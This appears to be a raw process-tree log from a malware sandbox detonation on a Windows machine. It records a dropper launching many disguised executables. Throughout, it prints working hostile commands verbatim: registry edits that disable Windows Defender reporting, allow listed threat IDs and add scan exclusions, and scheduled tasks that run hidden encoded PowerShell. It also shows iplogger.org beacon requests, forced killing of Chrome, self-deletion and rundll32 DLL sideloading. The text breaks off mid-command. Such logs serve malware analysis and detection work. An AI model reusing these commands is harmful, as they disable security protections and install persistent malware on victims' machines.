C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵PID:5252
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵PID:5540
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵PID:5640
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵PID:6140
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gqEqIUWFh" /SC once /ST 13:41:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- Creates scheduled task(s)
PID:5588
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gqEqIUWFh"6⤵PID:5528
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gqEqIUWFh"6⤵PID:1316
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bnkqNuphAZeBTHhYMc" /SC once /ST 14:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\WOJEBgcpJeoAyOioJ\wwLMGvKHJFdcKei\JJujxgo.exe\" j1 /site_id 525403 /S" /V1 /F6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4448
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\IvsskHJfubsqZ5nFS_xpOLRK.exe"C:\Users\Admin\Pictures\Adobe Films\IvsskHJfubsqZ5nFS_xpOLRK.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2616 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 4644⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5864
-
-
-
C:\Users\Admin\Pictures\Adobe Films\beb9YTbvJFLvLXX592jpxOvD.exe"C:\Users\Admin\Pictures\Adobe Films\beb9YTbvJFLvLXX592jpxOvD.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:368 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "1.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1qfDf7"4⤵PID:4684
-
C:\Users\Admin\AppData\Local\Temp\1.exe"1.exe"5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3668
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.org/1qfDf7"5⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:4136
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\MFPmIIhwR3njJSHvNPzgPYo6.exe"C:\Users\Admin\Pictures\Adobe Films\MFPmIIhwR3njJSHvNPzgPYo6.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3012
-
-
C:\Users\Admin\Pictures\Adobe Films\DzNmPWdwKQwiMdPEyWA0pWIZ.exe"C:\Users\Admin\Pictures\Adobe Films\DzNmPWdwKQwiMdPEyWA0pWIZ.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
PID:3752 -
C:\Users\Admin\AppData\Local\Temp\93ca6fa8-9fe0-4132-baf8-6414ddbd5187.exe"C:\Users\Admin\AppData\Local\Temp\93ca6fa8-9fe0-4132-baf8-6414ddbd5187.exe"4⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:4724
-
-
C:\Users\Admin\AppData\Local\Temp\c8543649-03e9-461c-bb64-bc5598521773.exe"C:\Users\Admin\AppData\Local\Temp\c8543649-03e9-461c-bb64-bc5598521773.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5448 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 14285⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5760
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\PhK8unYY2mmDRFfEIEhrxgqj.exe"C:\Users\Admin\Pictures\Adobe Films\PhK8unYY2mmDRFfEIEhrxgqj.exe"3⤵
- Executes dropped EXE
PID:320 -
C:\Users\Admin\AppData\Local\Temp\go-memexec-2546849896.exeC:\Users\Admin\AppData\Local\Temp\go-memexec-2546849896.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4996
-
-
-
C:\Users\Admin\Pictures\Adobe Films\T4GuP5xLZ5KygBfWzf7jpOvR.exe"C:\Users\Admin\Pictures\Adobe Films\T4GuP5xLZ5KygBfWzf7jpOvR.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3344
-
-
C:\Users\Admin\Pictures\Adobe Films\NROUveYetDLp89YeLjvoyKcP.exe"C:\Users\Admin\Pictures\Adobe Films\NROUveYetDLp89YeLjvoyKcP.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3000
-
-
C:\Users\Admin\Pictures\Adobe Films\Zh3M5OU4FZcI7PVNDwUeCUKJ.exe"C:\Users\Admin\Pictures\Adobe Films\Zh3M5OU4FZcI7PVNDwUeCUKJ.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3220 -
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",4⤵PID:5888
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",5⤵
- Loads dropped DLL
PID:5424 -
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",6⤵PID:5456
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",7⤵
- Loads dropped DLL
PID:4984
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\PSJX3kTgFrzS6xbKJXjbH2XR.exe"C:\Users\Admin\Pictures\Adobe Films\PSJX3kTgFrzS6xbKJXjbH2XR.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2624
-
-
C:\Users\Admin\Pictures\Adobe Films\UPLs6tY8WjwSKiXVW8fL8JqY.exe"C:\Users\Admin\Pictures\Adobe Films\UPLs6tY8WjwSKiXVW8fL8JqY.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2536 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2536 -s 13004⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3548
-
-
-
C:\Users\Admin\Pictures\Adobe Films\9hvXSXrdixXuUYtM4HT7kFel.exe"C:\Users\Admin\Pictures\Adobe Films\9hvXSXrdixXuUYtM4HT7kFel.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:2516 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 9hvXSXrdixXuUYtM4HT7kFel.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\9hvXSXrdixXuUYtM4HT7kFel.exe" & del C:\ProgramData\*.dll & exit4⤵PID:3476
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 9hvXSXrdixXuUYtM4HT7kFel.exe /f5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5008
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
PID:6120
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\EJegy7njpw4NcGC4TPkpQFA9.exe"C:\Users\Admin\Pictures\Adobe Films\EJegy7njpw4NcGC4TPkpQFA9.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
PID:3660 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc YwBtAGQAIAAvAGMAIAB0AGkAbQBlAG8AdQB0ACAAMgAwAA==4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3448 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout 205⤵PID:4184
-
C:\Windows\SysWOW64\timeout.exetimeout 206⤵
- Delays execution with timeout.exe
PID:4668
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3660 -s 20004⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4876
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\askinstall49.exe"C:\Users\Admin\AppData\Local\Temp\askinstall49.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3372 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵PID:448
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:368
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1pbEa72⤵
- Suspicious use of WriteProcessMemory
PID:368 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,11823168568097411713,102048783089189035,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:23⤵PID:2864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2176,11823168568097411713,102048783089189035,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:33⤵PID:1208
-
-
-
C:\Users\Admin\AppData\Local\Temp\soft.exe"C:\Users\Admin\AppData\Local\Temp\soft.exe"2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1292
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffab2de46f8,0x7ffab2de4708,0x7ffab2de47181⤵PID:1216
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1704
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:3188
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k wusvcs -p1⤵PID:4076
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2616 -ip 26161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2508
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4148 -ip 41481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3968
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4140 -ip 41401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1012
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4148 -ip 41481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1884
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4148 -ip 41481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5804
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:4064
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4684
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 2536 -ip 25361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4788
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4148 -ip 41481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4388
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5448 -ip 54481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1188
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3660 -ip 36601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4568
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 4148 -ip 41481⤵PID:4208
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4148 -ip 41481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3720
-
C:\Users\Admin\AppData\Local\Temp\WOJEBgcpJeoAyOioJ\wwLMGvKHJFdcKei\JJujxgo.exeC:\Users\Admin\AppData\Local\Temp\WOJEBgcpJeoAyOioJ\wwLMGvKHJFdcKei\JJujxgo.exe j1 /site_id 525403 /S1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Drops file in System32 directory
PID:4208 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2472 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:1856
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:3344
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:5604
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4244
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:6068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:4892
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:5856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:5620
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:1016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:4564
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4268
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:5052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:4204
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:4960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4136
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:4928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:6008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:5704
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:5868
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:3672
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:5680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:1476
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GuXKuCyCeSmjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GuXKuCyCeSmjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bQZEOuyekqRU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bQZEOuyekqRU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lSmWvXKKfqUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lSmWvXKKfqUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uAhcATovcXckvYCnvyR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uAhcATovcXckvYCnvyR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows 